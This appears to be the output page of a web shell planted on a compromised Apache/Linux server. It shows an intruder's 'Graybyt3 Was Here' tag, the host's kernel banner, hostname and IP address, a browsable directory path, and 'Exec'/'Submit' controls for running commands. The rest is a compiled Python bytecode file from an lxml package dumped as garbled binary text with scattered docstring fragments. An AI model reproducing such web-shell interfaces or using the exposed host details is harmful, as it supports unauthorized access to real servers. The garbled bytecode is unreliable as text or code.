Graybyt3 Was Here
Linux cloud.locucionar.com 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022 x86_64
Apache
91.191.211.241
/
opt
/
imunify360
/
venv
/
lib64
/
python3.11
/
site-packages
/
lxml
/
html
/
__pycache__
[ HOME ]
Exec
Submit
_html5builder.cpython-311.pyc
� S�Fh� � � � d Z ddlmZmZ ddlmZmZ G d� de� � Z G d� de� � Z G d� d ej � � Z d S )z� Legacy module - don't use in new code! html5lib now has its own proper implementation. This module implements a tree builder for html5lib that generates lxml html element trees. This module uses camelCase as it follows the html5lib style guide. � )�_base�etree)�htmlr c � � e Zd Zd� ZdS )�DocumentTypec �0 � || _ || _ || _ d S �N)�name�publicId�systemId)�selfr r r s �y/builddir/build/BUILD/imunify360-venv-2.5.3/opt/imunify360/venv/lib64/python3.11/site-packages/lxml/html/_html5builder.py�__init__zDocumentType.__init__ s � ��� � �� � �� � � � N)�__name__� __module__�__qualname__r � r r r r s# � � � � � �!� !� !� !� !r r c � � e Zd Zd� Zd� ZdS )�Documentc �"